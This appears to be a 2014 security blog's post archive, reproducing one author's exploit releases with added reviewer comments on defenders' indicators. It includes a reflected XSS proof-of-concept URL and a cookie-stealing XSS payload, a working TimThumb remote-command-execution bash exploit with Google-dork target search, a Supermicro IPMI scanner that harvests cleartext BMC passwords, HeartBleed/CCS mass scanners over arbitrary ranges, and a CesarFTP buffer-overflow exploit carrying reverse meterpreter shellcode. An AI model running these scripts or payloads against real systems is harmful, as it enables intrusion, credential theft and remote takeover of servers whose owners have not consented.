Monday, July 21, 2014

MyConnection Server (MCS) Reflective XSS



Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vendor Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Because certain GET variables passed to the connection test page (usually test.php) are not sanitized, client-side JavaScript can be injected and will run in the browser of any user who opens a crafted link to the site. Several parameters, including testtype, ver, cm, map, lines, duration and others, appear to be vulnerable.


POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script>


VULNERABLE CODE:

* Both voiplines and testlength are written into the page with document.write() without being sanitized, which makes them vulnerable to reflected XSS.

<!-- "Current Settings" cell: each inline script below writes a page variable straight into the document. -->
<td valign="top" width="30%"><b>Current
    Settings</b>
          <br>
          <br>
          <b>VoIP Lines Simulated</b>:
          <!-- NOTE(review): document.write() emits voiplines as markup, not as text. If the value reaches the page unencoded from the request (as the advisory states), tags inside it are rendered. Restrict it to a number and/or HTML-encode it before output. -->
          <script type="text/javascript"> document.write(voiplines); </script><br>
          <b>Test Length</b>:
          <!-- NOTE(review): same sink and same remedy as voiplines above. -->
          <script type="text/javascript"> document.write(testlength); </script><br>
          <b>Codec</b>:
          <!-- Here codec is only compared with a literal; what gets written is nameg711 or nameg729, whose origin is not visible in this excerpt. -->
          <script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
    else { document.write(nameg729); }
          </script><br>
          </td>
          <td align="left" width="70%">
          <p align="center">
<script>


Friday, June 27, 2014

TimThumb WebShot Code Execution Exploit (0-day)

 


#!/bin/bash
# Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3
# (c) http://treadstonesecurity.blogspot.ca
# Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# ABOUT:
# TimThumb’s “Webshot” feature allows certain commands to be executed remotely on the
# vulnerable website (no authentication required). With a simple command, an
# attacker can create, remove and modify any files on your server. Timthumb 2.8.11-2.8.13
# with the WEBSHOT_ENABLED option enabled appear to be vulnerable; installations that
# leave WEBSHOT_ENABLED off are not described as affected.
#
# USAGE:
# ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# NOTE: proxy and command fields are optional.
#
# EXAMPLE:
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'

# BANNER
# Clears the terminal and prints the tool banner.
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"
echo ""

# VARS
# Tool paths are resolved with `which`; an empty value means the tool was not found.
# UNICORNSCAN is assigned here but not referenced again in this script.
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
# Positional arguments: host, path to timthumb.php, optional "proxy" switch, optional command.
TARGET=$1
BASE_PATH=$2
PROXY=$3
COMMAND=$4

# REQUIREMENTS
# NOTE(review): the message below says the run continues without proxy support, but the
# `exit` that follows ends the script, so proxychains is required even for direct mode.
# A bare `exit` returns the status of the preceding echo (0), so these early exits are
# indistinguishable from success to a caller.
if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

# curl performs the HTTP request in both modes, so it is mandatory.
if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

# Both the host and the script path must be supplied; otherwise print usage and stop.
if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then
    echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"
    exit
fi

# Mode dispatch. "google" only opens a browser search and exits; otherwise one HTTP GET is
# sent to TARGET+BASE_PATH, through proxychains when the third argument is "proxy".
# NOTE(review): defender view - the request built below is recognisable in web access logs
# as a hit on timthumb.php carrying webshot=1 together with a src value that contains "$(".
# Per the header, only installs with WEBSHOT_ENABLED switched on are reported as affected,
# so keeping that option off (and reviewing logs for the pattern above) is the relevant control.
if [ $TARGET == "google" ]; then
# USE GOOGLE HACKING TO FIND VULNERABLE SERVERS
    # Launches iceweasel in the background with a fixed search URL; no request goes to TARGET.
    echo "Searching Google..."
    iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
    echo "(--==== Scanning via proxy..."

    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        # The URL is echoed first, then fetched; only response lines containing "version" are shown.
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        # Same request shape, with the fourth argument placed inside the src value.
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit

else
# NO PROXY
    # Identical to the proxy branch except that curl is called directly.
    echo "(--==== Scanning via direct connection..."

    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit
fi

# Both branches above end in `exit`, so the lines below are never reached.
echo ""
echo "(--==== Scan Complete!"
exit

Saturday, June 21, 2014

Supermicro IPMI/BMC Cleartext Password Scanner


#!/bin/bash
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
#
# ABOUT:
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to
# request the file PSBlock via port 49152. This plain text password file contains IPMI
# username and password information. This script allows users to scan their networks
# to check for vulnerable systems that require patching.
#
# USAGE:
# ./supermicro_scan.sh 74.200.8.237 - Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy
# ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ
#

# Banner, tool discovery and argument capture; stops early when a prerequisite is missing.
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"
echo ""

# Tool paths come from `which`; an empty value means the tool was not found.
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
# $1 is the address or CIDR range (or the search keyword), $2 the optional "proxy" switch.
TARGET=$1
PROXY=$2

# unicornscan performs the port sweep, so it is mandatory.
if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

# NOTE(review): the message says the scan continues without proxy support, but the `exit`
# below stops the script, so proxychains is required even for direct scans.
if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

# curl fetches the file from each responding host.
if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

# No target given: print usage. A bare `exit` returns the status of the echo (0).
if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> [proxy]"
    exit
fi

# Mode dispatch: the search keyword opens a browser and exits; otherwise TARGET is swept on
# TCP 49152 and /PSBlock is requested from every address unicornscan reports.
# NOTE(review): what this loop prints is clear-text BMC credentials. Treat the terminal and
# any captured log as secret, rotate every password that shows up, and keep BMC interfaces
# (and port 49152) reachable only from a management network until the systems are patched.
if [ $TARGET == "shodan" ]; then
# SCAN USING SHODANHQ SEARCH
    # Launches iceweasel in the background with a fixed search URL; nothing is sent to a target.
    echo "Searching ShowdanHQ..."
    iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
    echo "(--==== Scanning via proxy..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    # awk keeps the fifth whitespace-separated field of each unicornscan line (presumably the
    # address - confirm against the installed unicornscan's output format); its stderr is dropped.
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        # -m 3: 3 s cap per request; --retry 1: one retry; -f: no body on HTTP errors;
        # -#: progress bar. `strings` keeps only the printable runs of the response.
        proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

else
# NO PROXY
    # Same sweep and fetch as above, with curl called directly.
    echo "(--==== Scanning via direct connection..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

fi

# Both branches above end in `exit`, so the lines below are never reached.
echo ""
echo "(--==== Scan Complete!"
exit

Monday, June 9, 2014

AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws


x---==== Exploit Title: AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws
x---==== Date: Mon Jun 9 2014
x---==== Author: 1N3
x---==== Homepage: http://treadstonesecurity.blogspot.ca
x---==== Software Link: http://www.algosec.com/en/products_solutions/products/fireflow
x---==== Version: 6.3 (Other versions may also be susceptible)

x---==== Vulnerability
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflective XSS and HTML injection attacks. This may allow attackers to automatically execute arbitrary JavaScript on behalf of other logged-in users on the system by substituting XSS code in their signature.

x---==== Vulnerable URL:
https://fireflowhostname.com/FireFlow/SelfService/Prefs.html

x---==== XSS Code:
<script>alert(document.cookie)</script>

Friday, June 6, 2014

OpenSSL CCS & HeartBleed Mass Scanner


#!/bin/bash
# MassBleed OpenSSL Scanner v20140609 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# ABOUT:
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
#
# PROXY USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# VULNERABILITIES:
# 1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
# 2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
#
# REQUIREMENTS:
# Is the heartbleed POC present?
# Is the openssl CCS script present?
# Is unicornscan installed?
# Is nmap installed?

# Banner, helper and tool discovery, argument capture; stops early when a prerequisite is missing.
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== MassBleed OpenSSL Scanner by 1N3"
echo ""

# The two helper scripts are looked up in the current directory by capturing `ls` output;
# when a file is absent the variable is empty (ls writes its error to stderr).
HEARTBLEED=`ls heartbleed.py`
OPENSSL_CCS=`ls openssl_ccs.pl`
# Tool paths come from `which`; an empty value means the tool was not found.
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
# Positional arguments: range/host, scan type, custom port, "proxy" switch.
RANGE=$1
SCAN_TYPE=$2
CUSTOM_PORT=$3
PROXY=$4
# NOTE(review): the header advertises ports 1-10000 for "single" mode, but the range used is
# 1-65000; ports above 65000 are not covered, so a clean result does not extend to them.
PORT_RANGE="1-65000"

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford (https://gist.github.com/sh1n0b1/10100394) and place in same directory named: heartbleed.py"
    exit
fi

if [ "$OPENSSL_CCS" != "openssl_ccs.pl" ]; then
    echo "(--==== openssl_ccs.pl not found!"
    echo "(--==== To fix, download the script from RedHat (https://access.redhat.com/labs/ccsinjectiontest/) and place in same directory named: openssl_ccs.pl"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

# nmap is required here, although no nmap call appears in the rest of this script.
if [ "$NMAP" == "" ]; then
    echo "(--==== Nmap not installed! Exiting..."
    exit
fi

# No range given: print usage. A bare `exit` returns the status of the echo (0).
if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

# Dispatch on PROXY and SCAN_TYPE. Each mode uses unicornscan to list hosts or ports, then runs
# heartbleed.py and openssl_ccs.pl per result and keeps only the output lines that contain
# "vulnerable" / "affected".
# NOTE(review): a host that prints nothing has not been shown to be patched - a timeout, a
# proxy failure or different wording in the helper scripts' output also yields no line.
# NOTE(review): in both halves the `else` of the "port" test is the default 443 sweep, so that
# sweep also runs after a "single" or "subnet" scan has finished.
if [ "$PROXY" = "proxy" ]; then
    echo "(--==== Scanning via proxy..."
    if [ "$SCAN_TYPE" = "single" ]; then
        # One host: either the given port, or (port argument "0") every port unicornscan reports.
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking HeartBleed: $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep vulnerable
            echo "(--==== Checking OpenSSL CCS: $RANGE:$CUSTOM_PORT" && proxychains perl openssl_ccs.pl $RANGE $CUSTOM_PORT | grep affected;
        else
            # awk field 4, trimmed at "]", is taken as the port (presumably - depends on unicornscan's output format).
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "(--==== Checking HeartBleed $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS $RANGE:"$a && proxychains perl openssl_ccs.pl $RANGE $a | grep affected;
            done;
        fi
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        # RANGE is a three-octet prefix ending in "."; the last octet runs from 1 to 254.
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "(--==== $RANGE$a:$b"
                echo "(--==== Checking HeartBleed:" && proxychains python heartbleed.py $RANGE$a -p $b | grep vulnerable
                # NOTE(review): this line runs perl on heartbleed.py, whereas every other CCS check
                # calls openssl_ccs.pl; CCS results from proxy+subnet mode should not be relied on.
                echo "(--==== Checking OpenSSL CCS:" && proxychains perl heartbleed.py $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        # awk field 6 is taken as the host address (presumably - depends on unicornscan's output format).
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && proxychains perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        # Default sweep of RANGE on 443/tcp.
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && proxychains python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && proxychains perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
else
    # Direct connection: same modes without proxychains. "single" always walks PORT_RANGE here;
    # CUSTOM_PORT is not consulted in this branch.
    if [ "$SCAN_TYPE" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do
                echo "(--==== Checking HeartBleed $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep vulnerable
                echo "(--==== Checking OpenSSL CCS $RANGE:"$a && perl openssl_ccs.pl $RANGE $a | grep affected
        done;
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "$RANGE$a:$b"
                    echo "(--==== Checking HeartBleed:" && python heartbleed.py $RANGE$a -p $b | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS:" && perl openssl_ccs.pl $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        # Default sweep of RANGE on 443/tcp.
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
fi

# Reached in every mode; a bare `exit` returns the status of the echo (0) whatever was found.
echo "(--==== Scan Complete!"
exit

Saturday, April 26, 2014

CesarFtp 0.99g Buffer Overflow Exploit

#!/usr/bin/python
#CesarFtp 0.99g Buffer Overflow Exploit by 1N3 @ treadstonesecurity.blogspot.ca
#Uses Metasploit's exploit/multi/handler reverse meterpreter shellcode to gain remote access to the target. Replace as needed.

from socket import *

# Opaque payload bytes appended to the request built further down. The author's label says
# "reverse meterpreter shell 4444"; the bytes themselves are not decoded or verified here.
# NOTE(review): if that label is accurate, an unexpected outbound TCP connection on port 4444
# from the FTP server host is the network-side indicator to watch for.
shellcode = ( # reverse meterpreter shell 4444
"\xbb\x9c\x7e\x21\x9b\xdb\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x18\x31\x5a\x13\x83\xc2\x04\x03\x5a\x93\x9c\xd4\x67\x9a\xbb"
"\x73\x13\x9f\x0b\xf7\x63\x13\xe7\x57\x78\xa0\xe5\xdc\xf2\x96"
"\xa4\x4e\xbc\xd5\xb0\xad\x73\xea\xe3\xff\x06\xe3\x97\x6a\xe1"
"\x70\xe2\x56\x7a\xca\xe8\xde\xf7\x9e\xff\x02\x09\xf7\x8b\x7a"
"\x51\x06\x64\xf7\x10\x34\x75\xe6\xd0\x2d\x79\xa5\xbc\xac\xeb"
"\x4b\xbe\x7e\x7c\x23\x80\xd6\x94\xbe\x68\x24\x9b\xaf\x34\xa1"
"\x7a\x9c\x73\xbd\x2f\x72\x2b\xec\xa5\x64\x82\x59\x6c\x7a\xc1")

def intel_order(i):
    """Encode the low 32 bits of ``i`` as four characters, least-significant byte first.

    Each character is ``chr()`` of one 8-bit slice of ``i``; bits above the
    32nd are ignored.

    Args:
        i: Integer to encode.

    Returns:
        A four-character string in little-endian ("Intel") byte order.
    """
    octets = []
    for _ in range(4):
        # Take the current low byte, then move the next byte into place.
        octets.append(chr(i % 256))
        i >>= 8
    return "".join(octets)

# Script body (Python 2 syntax - note the print statements): log in to an FTP server and
# send a single oversized MKD command.
# The target is a hard-coded private (RFC 1918) address with an ftp/ftp login.
host = "192.168.23.112"
port = 21
user = "ftp"
password = "ftp"
# The value written over the saved return address. Per the inline labels each candidate is
# tied to one specific module build, so the script as published fits only that lab setup.
#EIP = 0x77D718FC #jmp esp <user32.dll XP SP1 english>
EIP = 0x76AA679b #jmp esp <metasploit module>

# Plain TCP connection; every server reply is read (up to 1024 bytes) and printed.
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

# The MKD argument: newline padding, three filler bytes, the packed address, a run of 0x90
# bytes and the payload, terminated by CRLF.
# NOTE(review): for defenders the signature is an MKD command whose argument runs to
# hundreds of bytes and contains bare newlines and non-printable data. Length limits on FTP
# commands at a proxy/IDS flag this class of request; the affected CesarFTP 0.99g build
# should be retired or replaced.
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

Wednesday, April 16, 2014

MassBleed OpenSSL HeartBleed Scanner



#!/bin/bash
# massbleed.sh 20140423 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
# USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# Prerequisites:
# Is the heartbleed POC present?
# Is unicornscan installed?
# Is nmap installed?

# Banner, helper and tool discovery, argument capture; stops early when a prerequisite is missing.
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== massbleed.sh 20140423 by 1N3"
echo ""

# heartbleed.py is looked up in the current directory by capturing `ls` output; when the
# file is absent the variable is empty (ls writes its error to stderr).
HEARTBLEED=`ls heartbleed.py`
# Tool paths come from `which`; an empty value means the tool was not found.
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
# Positional arguments: range/host, scan type, custom port, "proxy" switch.
RANGE=$1
ALL_PORTS=$2
CUSTOM_PORT=$3
PROXY=$4
# NOTE(review): the header advertises ports 1-10000 for "single" mode, but the range used is
# 1-65000; ports above 65000 are not covered, so a clean result does not extend to them.
PORT_RANGE="1-65000"

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== unicornscan not installed! Exiting..."
    exit
fi

# nmap is required here, although no nmap call appears in the rest of this script.
if [ "$NMAP" == "" ]; then
    echo "(--==== nmap not installed! Exiting..."
    exit
fi

# No range given: print usage. A bare `exit` returns the status of the echo (0).
if [ -z "$1" ]; then
    echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

# Dispatch on PROXY and ALL_PORTS (the scan type). Each mode uses unicornscan to list hosts or
# ports, then runs heartbleed.py per result and keeps only output lines containing "Server".
# NOTE(review): a host that prints nothing has not been shown to be patched - a timeout, a
# proxy failure or different wording in heartbleed.py's output also yields no line.
# NOTE(review): in both halves the `else` of the "port" test is the default 443 sweep, so that
# sweep also runs after a "single" or "subnet" scan has finished.
if [ "$PROXY" = "proxy" ]; then
    echo "(--==== scanning via proxy..."
    if [ "$ALL_PORTS" = "single" ]; then
        # One host: either the given port, or (port argument "0") every port unicornscan reports.
        # The `2> /dev/null` on these lines applies to grep's stderr only, not to heartbleed.py's.
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null
        else
            # awk field 4, trimmed at "]", is taken as the port (presumably - depends on unicornscan's output format).
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
            done;
        fi
    fi
    if [ "$ALL_PORTS" = "subnet" ]; then
        # RANGE is a three-octet prefix ending in "."; the last octet runs from 1 to 254.
        for a in {1..254};
        do
            echo "Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "$RANGE$a:$b"
                proxychains python heartbleed.py $RANGE$a -p $b | grep Server;
            done;
        done;
    fi
    if [ "$ALL_PORTS" = "port" ]; then
        # awk field 6 is taken as the host address (presumably - depends on unicornscan's output format).
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
        done;
    else
        # Default sweep of RANGE on 443/tcp.
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server;
        done
    fi
else
    # Direct connection: same modes without proxychains. "single" always walks PORT_RANGE here;
    # CUSTOM_PORT is not consulted in this branch.
    if [ "$ALL_PORTS" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
        done;
    fi
    if [ "$ALL_PORTS" = "subnet" ]; then
        for a in {1..254};
        do
            echo "Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "$RANGE$a:$b"
                python heartbleed.py $RANGE$a -p $b | grep Server;
            done;
        done;
    fi
    if [ "$ALL_PORTS" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
        done;
    else
        # Default sweep of RANGE on 443/tcp.
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server;
        done
    fi
fi

# Reached in every mode; a bare `exit` returns the status of the echo (0) whatever was found.
echo "(--==== scan complete!"
exit